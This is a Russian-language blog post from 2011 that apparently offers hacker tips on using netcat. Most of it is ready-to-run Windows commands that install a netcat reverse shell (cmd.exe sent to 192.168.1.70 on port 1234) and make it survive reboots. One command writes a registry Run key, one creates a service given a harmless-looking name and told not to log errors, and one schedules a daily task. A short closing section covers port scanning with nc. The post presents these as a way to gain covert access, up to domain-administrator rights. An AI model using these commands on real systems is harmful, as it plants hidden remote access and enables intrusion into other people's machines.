пятница, 23 сентября 2011 г.

Секреты netcat


Задача: необычным способом запустить netcat с явной выгодой для хакера

Приведу несколько способов запуска netcat’а, о которых мало кто знает.

Решение

1. Бекдоринг netcat’ом – путем добавления соответствующего ключа в ветку реестра для автозапуска:
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d “c:\windows\nc.exe –d 192.168.1.70 1234 –e cmd.exe”
При последующем логине в систему произойдет запуск netcat с открытием шелла на 1234 порту. Нюанс тут в том, что бекдор исполнится с правами того пользователя, который залезет на эту машину. Поэтому такие действия вполне могут открыть доступ полноценного администратора домена.
2. Исполнение бекдора в режиме «Windows Service». Вообще, netcat никогда не был заточен под виндовую службу, но, извратившись, мы можем сделать его таковым:
sc create Network Connections Service binPath= “cmd /K start c:\nc.exe –d 192.168.1.70 1234 –e cmd.exe” start= auto error= ignore
Командой SC создается сервис с несуществующим именем (чтобы в глаза не бросалось) «Network Connections Service». Флаг start= auto указывает, чтобы сервис запускался сразу после загрузки ОС, а error=ignore – запрещает посылать какие-либо логи в системный журнал. Если все сделано правильно, то тебя обрадует надпись «[SC] CreateService SUCCESS». Соль в том, что даже если операционка будет перезапущена, с ее включением бекдор вновь начнет свою работу.
3. Запуск netcat с использованием Windows Task Sheduler (планировщика задач). Как вариант, можно запустить netcat в определенное время, а именно – когда темно и тихо. В этом нам поможет встроенный в Windows планировщик.
net start schedule
at 12:00:00 /every:m,t,w,th,f,s,su “”c:\nc.exe –d 192.168.1.70 1234 –e cmd.exe””
Каждый день (буквы отвечают за дни недели), в 12:00:00 у нас будет открываться шелл.

Задача: просканировать порты netcat’ом

Решение

Мало кто знает, что netcat может выступать отличным средством сканирования портов. Достаточно запустить его в соответствующем режиме:
nc –z –n –v –w 1 192.168.1.100 1-1024
nc –n –v –w 1 –z 192.168.1.100 20 21 22 25 80 8080
В обоих примерах используются следующие флаги:
  • -z (zero-input/output mode) (работа без программных задержек);
  • -n (numeric-only, используем, так как задается IP-адрес, а не домен);
  • -w (таймаут на коннекты в секундах).
Автор: на
Ярлыки: ,

Комментариев нет:

Отправить комментарий

Подписаться на: Комментарии к сообщению (Atom)